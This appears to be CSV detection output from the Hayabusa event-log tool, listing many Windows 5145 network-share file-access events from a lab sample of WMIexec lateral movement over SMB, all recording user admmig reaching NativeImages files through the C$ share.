10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#\dd3aaf75f45749961d52d194dab801a2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P08ac43d5#\e18185ddd154ffdd54cb6c9f0ee8bd44 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.827 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P9de5a786#\c3205ecae7e5cd14582725a8b5e0d26b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P10d01611#\a29f0b2b0504e328a9aa939a93159e40 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P34f388c1#\46b29d8a49f03df40a948c722e1b8971 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.843 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P1706cafe#\45a67d74e9938935daab6173a971be6c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.858 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P047767ce#\b990850a0f13973108c783788afd003b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#\c27e496be774922205ac8ce981a1d43f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P655586bb#\b00bc572c066b64da974fc25989bc647 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.874 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P39041136#\d5147e76aac8b85f995ed7aeb6936907 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.890 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pae3498d9#\92502f352b3e8ec57c8956a28e4dea98 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pb378ec07#\d9659b5db4bc25a33861dbc0ca19c837 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pcd26229b#\adfb2cd1f200788f6e0472379725ce7f : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pd3efef62#\379936827e72fda4d66f53769c06c9ee : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.891 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Pefb7a36b#\4a462e10f0ca871771e1eba0d4708e2e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.R251a4777#\ab7fb35e2fb3e61e15dcaabbd82b7508 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.907 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.922 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S0f8e494c#\97871d486d086e08c66cb7bf9335e012 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S1bc92e04#\931ade8881fd66e64743490a332ca6a8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.938 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S8ca2c749#\cba0b74c99ed7ace30d99b1ed03059e9 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.953 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S54faafb0#\1ccd3b57c9350fc1afa3ed354290f755 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S356e1ba0#\0cf0db1a6758c7e0c0ba05029f155cfa : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.969 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.S88747207#\1c10bd935ecce56f3dada604138983f2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sa56e3556#\9c705405cffb72e6df411a91a2c062c7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:29.985 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Sb6a1f1bc#\88a7ae331deac4585f47de7e6e4277dc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.T9d753d8c#\e2e911ae8e5924a9ef63135cd8c6b797 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te49ad7d9#\f8a02123f968d1ae6940ac5d6a1dd485 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.001 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Te3736ca4#\e4a04c178babbb8bb5aaf6d60b47d649 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ud0e65fb9#\d90607e7c895999c98edb4043f0073e5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.017 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.V9921e851# : IP Address: 
